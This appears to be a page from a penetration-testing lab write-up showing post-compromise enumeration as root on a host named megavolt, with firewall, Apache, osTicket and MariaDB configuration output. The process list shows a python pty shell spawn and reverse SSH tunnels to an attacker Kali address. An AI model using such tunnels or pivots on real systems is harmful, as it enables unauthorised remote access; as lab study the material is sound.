Beyond
This is the beyond page that an additional post enumeration and assessment are conducted as the root user after compromising the target system.
Firewall
[root@megavolt ~]# ll /etc/firewalld
total 8
-rw-r--r--. 1 root root 2006 Aug 8 2019 firewalld.conf
drwxr-x---. 2 root root 6 Aug 8 2019 helpers
drwxr-x---. 2 root root 6 Aug 8 2019 icmptypes
drwxr-x---. 2 root root 6 Aug 8 2019 ipsets
-rw-r--r--. 1 root root 272 Aug 8 2019 lockdown-whitelist.xml
drwxr-x---. 2 root root 6 Aug 8 2019 services
drwxr-x---. 2 root root 46 Oct 6 2020 zones
[root@megavolt ~]# cat /etc/firewalld/firewalld.conf | grep -v '^[#/]'
DefaultZone=public
MinimalMark=100
CleanupOnExit=yes
Lockdown=no
IPv6_rpfilter=yes
IndividualCalls=no
LogDenied=off
AutomaticHelpers=system
[root@megavolt ~]# cat /etc/firewalld/zones/public.xml | grep -v '^[#/]'
<?xml version="1.0" encoding="utf-8"?>
<zone>
<short>Public</short>
<description>For use in public areas. You do not trust the other computers on networks to not harm your computer. Only selected incoming connections are accepted.</description>
<service name="ssh"/>
<service name="dhcpv6-client"/>
</zone>ssh
[root@megavolt ~]# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
ACCEPT all -- anywhere anywhere
ACCEPT all -- anywhere anywhere ctstate NEW,RELATED,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:ssh
ACCEPT tcp -- anywhere anywhere tcp dpt:domain
ACCEPT tcp -- anywhere anywhere tcp dpt:http
ACCEPT udp -- anywhere anywhere udp dpt:domain
ACCEPT icmp -- anywhere anywhere icmp echo-request
ACCEPT icmp -- anywhere anywhere icmp echo-reply
DROP all -- anywhere anywhere
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
ACCEPT all -- anywhere anywhere
ACCEPT tcp -- anywhere anywhere tcp dpt:ssh state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:ssh state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:domain state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:domain state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:http state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:http state NEW,ESTABLISHED
ACCEPT udp -- anywhere anywhere udp dpt:domain state NEW,ESTABLISHED
ACCEPT icmp -- anywhere anywhere icmp echo-request
ACCEPT icmp -- anywhere anywhere icmp echo-reply
DROP all -- anywhere anywhere N/A
httpd
[root@megavolt ~]# systemctl status httpd.service
● httpd.service - The Apache HTTP Server
Loaded: loaded (/usr/lib/systemd/system/httpd.service; enabled; vendor preset: disabled)
Active: active (running) since Fri 2024-08-02 15:06:11 EDT; 7 months 9 days ago
Docs: man:httpd(8)
man:apachectl(8)
Main PID: 1064 (httpd)
Status: "Total requests: 5481; Current requests/sec: 0; Current traffic: 0 B/sec"
CGroup: /system.slice/httpd.service
├─1064 /usr/sbin/httpd -DFOREGROUND
├─1281 /usr/sbin/httpd -DFOREGROUND
├─1282 /usr/sbin/httpd -DFOREGROUND
├─2008 /usr/sbin/httpd -DFOREGROUND
├─2011 /usr/sbin/httpd -DFOREGROUND
├─2012 /usr/sbin/httpd -DFOREGROUND
├─2028 /usr/sbin/httpd -DFOREGROUND
├─2029 /usr/sbin/httpd -DFOREGROUND
├─2030 /usr/sbin/httpd -DFOREGROUND
├─2031 /usr/sbin/httpd -DFOREGROUND
├─2425 /usr/sbin/httpd -DFOREGROUND
├─6177 bash
├─6210 python3 -c import pty; pty.spawn("/bin/bash")
├─6211 /bin/bash
├─7615 ssh -f -N -R 2828:127.0.0.1:2828 kali@192.168.45.192
└─7717 ssh -f -N -R 4444:127.0.0.1:4444 kali@192.168.45.192
[root@megavolt ~]# cat /usr/lib/systemd/system/httpd.service | grep -v '^[#/]'
[Unit]
Description=The Apache HTTP Server
After=network.target remote-fs.target nss-lookup.target
Documentation=man:httpd(8)
Documentation=man:apachectl(8)
[Service]
Type=notify
EnvironmentFile=/etc/sysconfig/httpd
ExecStart=/usr/sbin/httpd $OPTIONS -DFOREGROUND
ExecReload=/usr/sbin/httpd $OPTIONS -k graceful
ExecStop=/bin/kill -WINCH ${MAINPID}
KillSignal=SIGCONT
PrivateTmp=true
[Install]
WantedBy=multi-user.target
[root@megavolt ~]# cat /etc/sysconfig/httpd | grep -v '^[#/]'
LANG=C
[root@megavolt ~]# cat /etc/httpd/conf/httpd.conf | grep -v '^[#/]'
ServerRoot "/etc/httpd"
Listen 80
Include conf.modules.d/*.conf
User apache
Group apache
ServerAdmin root@localhost
<Directory />
AllowOverride none
Require all denied
</Directory>
DocumentRoot "/var/www/html"
<Directory "/var/www">
AllowOverride None
Require all granted
</Directory>
<Directory "/var/www/html">
Options Indexes FollowSymLinks
AllowOverride None
Require all granted
</Directory>
<IfModule dir_module>
DirectoryIndex index.html
</IfModule>
<Files ".ht*">
Require all denied
</Files>
ErrorLog "logs/error_log"
LogLevel warn
<IfModule log_config_module>
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %b" common
<IfModule logio_module>
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio
</IfModule>
CustomLog "logs/access_log" combined
</IfModule>
<IfModule alias_module>
ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"
</IfModule>
<Directory "/var/www/cgi-bin">
AllowOverride None
Options None
Require all granted
</Directory>
<IfModule mime_module>
TypesConfig /etc/mime.types
AddType application/x-compress .Z
AddType application/x-gzip .gz .tgz
AddType text/html .shtml
AddOutputFilter INCLUDES .shtml
</IfModule>
AddDefaultCharset UTF-8
<IfModule mime_magic_module>
MIMEMagicFile conf/magic
</IfModule>
EnableSendfile on
IncludeOptional conf.d/*.confconf.d/*.conf
[root@megavolt ~]# ll /etc/httpd/conf.d/
total 24
-rw-r--r--. 1 root root 366 Apr 2 2020 README
-rw-r--r--. 1 root root 2926 Apr 2 2020 autoindex.conf
-rw-r--r--. 1 root root 320 Oct 6 2020 osticket.conf
-rw-r--r--. 1 root root 1252 Sep 29 2020 php.conf
-rw-r--r--. 1 root root 1252 Nov 27 2019 userdir.conf
-rw-r--r--. 1 root root 824 Nov 27 2019 welcome.conf
[root@megavolt ~]# cat /etc/httpd/conf.d/osticket.conf | grep -v '^[#/]'
<Directory "/var/www/html">
Options Indexes FollowSymLinks
AllowOverride None
Require all granted
</Directory>
<Directory "/var/www/html/attachments">
Options Indexes FollowSymLinks
AllowOverride all
Require all granted
</Directory>
<IfModule dir_module>
DirectoryIndex index.php
</IfModule>
[root@megavolt ~]# cat /etc/httpd/conf.d/userdir.conf | grep -v '^[#/]'
<IfModule mod_userdir.c>
#
# UserDir is disabled by default since it can confirm the presence
# of a username on the system (depending on home directory
# permissions).
#
UserDir disabled
#
# To enable requests to /~user/ to serve the user's public_html
# directory, remove the "UserDir disabled" line above, and uncomment
# the following line instead:
#
#UserDir public_html
</IfModule>
<Directory "/home/*/public_html">
AllowOverride FileInfo AuthConfig Limit Indexes
Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec
Require method GET POST OPTIONS
</Directory>mariadb
[root@megavolt ~]# systemctl status mariadb.service
● mariadb.service - MariaDB database server
Loaded: loaded (/usr/lib/systemd/system/mariadb.service; enabled; vendor preset: disabled)
Active: active (running) since Fri 2024-08-02 15:06:13 EDT; 7 months 9 days ago
Process: 1153 ExecStartPost=/usr/libexec/mariadb-wait-ready $MAINPID (code=exited, status=0/SUCCESS)
Process: 1068 ExecStartPre=/usr/libexec/mariadb-prepare-db-dir %n (code=exited, status=0/SUCCESS)
Main PID: 1152 (mysqld_safe)
CGroup: /system.slice/mariadb.service
├─1152 /bin/sh /usr/bin/mysqld_safe --basedir=/usr
└─1451 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib64/mysql/plugin --log-error=/var/log/mariadb/mariadb.log...
[root@megavolt ~]# cat /usr/lib/systemd/system/mariadb.service | grep -v '^[#/]'
[Unit]
Description=MariaDB database server
After=syslog.target
After=network.target
[Service]
Type=simple
User=mysql
Group=mysql
ExecStartPre=/usr/libexec/mariadb-prepare-db-dir %n
ExecStart=/usr/bin/mysqld_safe --basedir=/usr
ExecStartPost=/usr/libexec/mariadb-wait-ready $MAINPID
TimeoutSec=300
PrivateTmp=true
[Install]
WantedBy=multi-user.target